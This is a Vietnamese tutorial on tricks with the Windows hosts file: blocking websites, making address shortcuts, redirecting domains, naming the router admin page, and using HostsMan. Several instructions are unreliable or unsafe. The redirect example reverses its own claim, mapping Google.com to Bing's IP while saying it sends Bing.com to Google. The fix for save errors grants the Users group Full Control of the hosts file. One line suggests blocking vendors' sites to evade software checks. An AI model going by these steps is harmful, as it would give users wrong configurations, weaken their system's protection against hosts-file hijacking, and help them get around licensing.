Trước tiên, để chỉnh sửa được file Hosts, bạn phải khởi chạy notepad (hoặc bất kỳ phần mềm chỉnh sửa văn bản nào khác) bằng cách chọn Run as Administrator. Sau khi một trang notepad mới hiện ra, vào File > Open rồi dẫn đến địa chỉ C:\Windows\System32\drivers\etc, chọn hiển thị All File và kích đúp vào tập tin Hosts. Cách thực hiện này sẽ hạn chế lỗi khi lưu file Hosts của bạn so với cách thông thường là chuột phải vào file Hosts và chọn open with ...
Chặn một website
Bạn chỉ cần thêm vào dòng lệnh: 127.0.0.1 abc.com
cac-thu-thuat-huu-ich-voi-file-hosts
Trong đó: abc.com là trang web mà bạn muốn chặn. Cách thức hoạt động của nó là khi bạn truy cập địa chỉ abc.com, máy tính của bạn sẽ bị điều hướng truy cập đến chính máy tính của bạn (127.0.0.1). Trong khi máy tính của bạn không có một máy chủ web, do đó kết nối sẽ thất bại. Biện pháp này rất hữu hiệu cho các bạn muốn ngăn chặn sự kiểm duyệt từ các hãng với phần mềm của mình, chỉ cần đơn giản là chặn các liên kết đến trang web của phần mềm đó.
Tạo phím tắt cho một website
cac-thu-thuat-huu-ich-voi-file-hosts
Bạn có thể tạo một phím tắt cho một trang web ưa thích, để mỗi lần muốn truy cập bạn chỉ cần ấn phím tắt vào thanh địa chỉ và enter, không cần ghi đầy đủ tên một trang web. Để làm được điều này, bạn cần biết địa chỉ IP của trang web mà bạn muốn tạo phím tắt. Vào Start, gõ Command Promp > Enter, cửa sổ Command Promp sẽ hiện ra. Tại đây gõ vào lệnh: ping website_bạn_muốn_tìm_IP rồi enter, ví dụ như: ping google.com. Địa chỉ IP của trang web sẽ hiện ở ngay dòng đầu tiên.
  
cac-thu-thuat-huu-ich-voi-file-hosts
Công việc còn lại chỉ là nhập vào dòng lệnh sau: địa_chỉ_IP_website phím_tắt_bạn_muốn_chuyển vào file Hoste, ví dụ như: 74.125.128.113 G. Sau khi lưu lại, kết quả mỗi lần truy cập bạn chỉ cần gõ G lên thanh địa chỉ và ấn enter, trình duyệt sẽ tự động dẫn đến trang Google.com.
Chuyển hướng website
Tính năng này giống việc chuyển hướng cuộc gọi, bạn có thể chỉnh sửa file Hoste để khi truy cập một trang web, trình duyệt sẽ dẫn đến một trang web khác. Ví dụ như bạn muốn khi gõ vào thanh địa chỉ tên miền Bing.com, trình duyệt sẽ hiện ra trang Google.com, tuy nhiên tính năng này có hữu ích hay không thì còn tùy thuộc vào mỗi người.
Trước tiên bạn sẽ cần kiểm tra địa chỉ IP của trang Bing.com, bằng Command Promp đã nêu ở trên, sau khi đã biết IP của trang web đó ví dụ của Bing là 131.253.13.32, nhập vào file Hosts dòng lệnh:131.253.13.32 Google.com. Tương tự bạn có thể điều hướng một website khác đến bất kỳ website nào bạn muốn.
Chỉ định tên miền cho trang cấu hình router
Nếu bạn thường xuyên phải truy cập vào trang cấu hình router, và muốn tạo một tên miền dễ nhớ cho nó, thì bạn có thể thực hiện tương tự như thủ thuật tạo phím tắt cho website ở trên. Chỉ khác một điều là địa chỉ IP website sẽ được thay bằng địa chỉ Default Gateway, cũng là địa chỉ truy cập trang cấu hình router, và tên miền bạn có thể đặt tùy ý như Gateway, Admin hay chỉ 1 chữ cái như X.
cac-thu-thuat-huu-ich-voi-file-hosts
Ví dụ, câu lệnh có thể như sau:192.168.1.1 Admin hoặc 192.168.1.1 X.
Sử dụng phần mềm quản lý file Hosts
cac-thu-thuat-huu-ich-voi-file-hosts
Với một phần mềm quản lý file Hosts như HostsMan, bạn có thể dễ dàng chỉnh sửa và cập nhật các file Hosts trên trang hpHosts. hpHosts là trang web cung cấp các dữ liệu file Hosts giúp ngăn chặn các trang pop-up, quảng cáo và các trang web độc hại với danh sách liên tục được cập nhật. Bạn có thể lựa chọn ghi đè lên file Hosts hiện tại hoặc sát nhập cả hai để tránh bị mất những thiết lập từ trước của bạn. Bạn cũng có thể chỉnh sửa file Hosts bằng HostsMan với giao diện sử dụng rất đơn giản.
cac-thu-thuat-huu-ich-voi-file-hosts
Bạn có thể tải phần mềm HostsMan tại đây.
Khắc phục lỗi không lưu được file Hosts
Nhiều bạn không sử dụng cách thủ công để chỉnh sửa file Hosts như hướng dẫn ở phần đầu đã giới thiệu, do đó có thể bị lỗi không thể lưu được các thiết lập trong file Hosts. Để khắc phục lỗi này, bạn cần vào thư mục etc, đường dẫn C:\WINDOWS\system32\drivers\etc\, chuột phải vào file hosts và chọn Properties.
cac-thu-thuat-huu-ich-voi-file-hosts
Trong tab General, bỏ chọn Read-only. Chuyển qua tab Security, trong danh sách Group of user name, chọn Users, rồi chọn Edit. Trong khung Permissions chọn Full Control.
Chúc các bạn thành công !
Tham khảo: makeuseof